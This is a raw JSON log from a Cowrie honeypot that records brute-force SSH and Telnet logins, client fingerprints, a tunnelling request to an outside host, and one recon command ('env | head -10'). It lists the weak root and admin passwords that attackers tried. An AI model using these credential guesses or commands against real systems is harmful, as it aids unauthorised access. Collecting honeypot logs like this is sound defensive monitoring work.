{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104","size":289,"shasum":"69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:12:47.869653Z","src_ip":"212.227.235.229","session":"1d5e883add01"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:12:47.870581Z","src_ip":"212.227.235.229","session":"1d5e883add01"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51186,"dst_ip":"1.2.3.4","dst_port":23,"session":"f558249c2836","protocol":"telnet","message":"New connection: 212.227.125.160:51186 (1.2.3.4:23) [session: f558249c2836]","sensor":"my-vps","timestamp":"2025-08-28T08:12:53.873026Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51190,"dst_ip":"1.2.3.4","dst_port":23,"session":"eb4731b48b84","protocol":"telnet","message":"New connection: 212.227.125.160:51190 (1.2.3.4:23) [session: eb4731b48b84]","sensor":"my-vps","timestamp":"2025-08-28T08:12:54.921188Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51197,"dst_ip":"1.2.3.4","dst_port":23,"session":"ea98381fb9ef","protocol":"telnet","message":"New connection: 212.227.125.160:51197 (1.2.3.4:23) [session: ea98381fb9ef]","sensor":"my-vps","timestamp":"2025-08-28T08:12:56.823662Z"}
{"eventid":"cowrie.session.closed","duration":30.547895193099976,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:13:24.420823Z","src_ip":"212.227.125.160","session":"f558249c2836"}
{"eventid":"cowrie.session.closed","duration":30.661205053329468,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:13:25.582302Z","src_ip":"212.227.125.160","session":"eb4731b48b84"}
{"eventid":"cowrie.session.closed","duration":30.60921573638916,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:13:27.432803Z","src_ip":"212.227.125.160","session":"ea98381fb9ef"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44108,"dst_ip":"1.2.3.4","dst_port":22,"session":"e6030c01b41e","protocol":"ssh","message":"New connection: 212.227.235.229:44108 (1.2.3.4:22) [session: e6030c01b41e]","sensor":"my-vps","timestamp":"2025-08-28T08:13:47.133541Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:13:47.163210Z","src_ip":"212.227.235.229","session":"e6030c01b41e"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:13:47.450217Z","src_ip":"212.227.235.229","session":"e6030c01b41e"}
{"eventid":"cowrie.login.failed","username":"shipping","password":"shipping","message":"login attempt [shipping/shipping] failed","sensor":"my-vps","timestamp":"2025-08-28T08:13:49.940996Z","src_ip":"212.227.235.229","session":"e6030c01b41e"}
{"eventid":"cowrie.session.closed","duration":"5.2","message":"Connection lost after 5.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:13:52.383596Z","src_ip":"212.227.235.229","session":"e6030c01b41e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35352,"dst_ip":"1.2.3.4","dst_port":22,"session":"ee52ec1f5c65","protocol":"ssh","message":"New connection: 212.227.235.229:35352 (1.2.3.4:22) [session: ee52ec1f5c65]","sensor":"my-vps","timestamp":"2025-08-28T08:13:58.259264Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:13:58.311816Z","src_ip":"212.227.235.229","session":"ee52ec1f5c65"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:13:58.700072Z","src_ip":"212.227.235.229","session":"ee52ec1f5c65"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123","message":"login attempt [admin/123] failed","sensor":"my-vps","timestamp":"2025-08-28T08:13:59.928926Z","src_ip":"212.227.235.229","session":"ee52ec1f5c65"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:14:01.206324Z","src_ip":"212.227.235.229","session":"ee52ec1f5c65"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38919,"dst_ip":"1.2.3.4","dst_port":23,"session":"0fbad4716152","protocol":"telnet","message":"New connection: 212.227.235.229:38919 (1.2.3.4:23) [session: 0fbad4716152]","sensor":"my-vps","timestamp":"2025-08-28T08:14:11.514171Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":3619,"dst_ip":"1.2.3.4","dst_port":22,"session":"6ddad2f8a4bb","protocol":"ssh","message":"New connection: 212.227.125.160:3619 (1.2.3.4:22) [session: 6ddad2f8a4bb]","sensor":"my-vps","timestamp":"2025-08-28T08:14:11.871112Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:14:11.872235Z","src_ip":"212.227.125.160","session":"6ddad2f8a4bb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":3903,"dst_ip":"1.2.3.4","dst_port":22,"session":"3c0f74672060","protocol":"ssh","message":"New connection: 212.227.125.160:3903 (1.2.3.4:22) [session: 3c0f74672060]","sensor":"my-vps","timestamp":"2025-08-28T08:14:11.980505Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:14:11.981703Z","src_ip":"212.227.125.160","session":"3c0f74672060"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T08:14:12.093727Z","src_ip":"212.227.125.160","session":"3c0f74672060"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:14:12.431306Z","src_ip":"212.227.125.160","session":"3c0f74672060"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T08:14:12.544629Z","session":"3c0f74672060"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54893,"dst_ip":"1.2.3.4","dst_port":22,"session":"0be5b9806047","protocol":"ssh","message":"New connection: 212.227.235.229:54893 (1.2.3.4:22) [session: 0be5b9806047]","sensor":"my-vps","timestamp":"2025-08-28T08:14:19.871620Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:14:20.000647Z","src_ip":"212.227.235.229","session":"0be5b9806047"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:14:20.001610Z","src_ip":"212.227.235.229","session":"0be5b9806047"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaz2QAZ","message":"login attempt [root/1qaz2QAZ] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:14:22.730701Z","src_ip":"212.227.235.229","session":"0be5b9806047"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:14:23.085211Z","src_ip":"212.227.235.229","session":"0be5b9806047"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50239,"dst_ip":"1.2.3.4","dst_port":22,"session":"fe10f8e8aeea","protocol":"ssh","message":"New connection: 212.227.235.229:50239 (1.2.3.4:22) [session: fe10f8e8aeea]","sensor":"my-vps","timestamp":"2025-08-28T08:14:23.180909Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:14:23.184035Z","src_ip":"212.227.235.229","session":"fe10f8e8aeea"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:14:23.274531Z","src_ip":"212.227.235.229","session":"fe10f8e8aeea"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaz2QAZ","message":"login attempt [root/1qaz2QAZ] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:14:26.259217Z","src_ip":"212.227.235.229","session":"fe10f8e8aeea"}
{"eventid":"cowrie.session.closed","duration":17.239975929260254,"message":"Connection lost after 17 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:14:28.753044Z","src_ip":"212.227.235.229","session":"0fbad4716152"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:14:31.909388Z","src_ip":"212.227.235.229","session":"fe10f8e8aeea"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48425,"dst_ip":"1.2.3.4","dst_port":22,"session":"9007514d20dd","protocol":"ssh","message":"New connection: 212.227.125.160:48425 (1.2.3.4:22) [session: 9007514d20dd]","sensor":"my-vps","timestamp":"2025-08-28T08:15:18.066489Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T08:15:18.067526Z","src_ip":"212.227.125.160","session":"9007514d20dd"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T08:15:18.148353Z","src_ip":"212.227.125.160","session":"9007514d20dd"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-28T08:15:18.560016Z","src_ip":"212.227.125.160","session":"9007514d20dd"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:15:19.642817Z","src_ip":"212.227.125.160","session":"9007514d20dd"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:15:21.981044Z","src_ip":"212.227.125.160","session":"3c0f74672060"}
{"eventid":"cowrie.session.connect","src_ip":"186.225.142.90","src_port":56509,"dst_ip":"1.2.3.4","dst_port":22,"session":"c3f7eef4caa0","protocol":"ssh","message":"New connection: 186.225.142.90:56509 (1.2.3.4:22) [session: c3f7eef4caa0]","sensor":"my-vps","timestamp":"2025-08-28T08:15:40.916506Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:15:41.280806Z","src_ip":"186.225.142.90","session":"c3f7eef4caa0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:15:41.281514Z","src_ip":"186.225.142.90","session":"c3f7eef4caa0"}
{"eventid":"cowrie.login.success","username":"root","password":"09090909","message":"login attempt [root/09090909] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:15:43.207060Z","src_ip":"186.225.142.90","session":"c3f7eef4caa0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T08:15:44.229140Z","src_ip":"186.225.142.90","session":"c3f7eef4caa0"}
{"eventid":"cowrie.command.input","input":"env | head -10","message":"CMD: env | head -10","sensor":"my-vps","timestamp":"2025-08-28T08:15:44.229856Z","src_ip":"186.225.142.90","session":"c3f7eef4caa0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b","size":28,"shasum":"54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:15:44.909834Z","src_ip":"186.225.142.90","session":"c3f7eef4caa0"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:15:45.401248Z","src_ip":"186.225.142.90","session":"c3f7eef4caa0"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":59746,"dst_ip":"1.2.3.4","dst_port":22,"session":"78ba6567626d","protocol":"ssh","message":"New connection: 217.72.205.35:59746 (1.2.3.4:22) [session: 78ba6567626d]","sensor":"my-vps","timestamp":"2025-08-28T08:16:37.115635Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:16:37.116762Z","src_ip":"217.72.205.35","session":"78ba6567626d"}
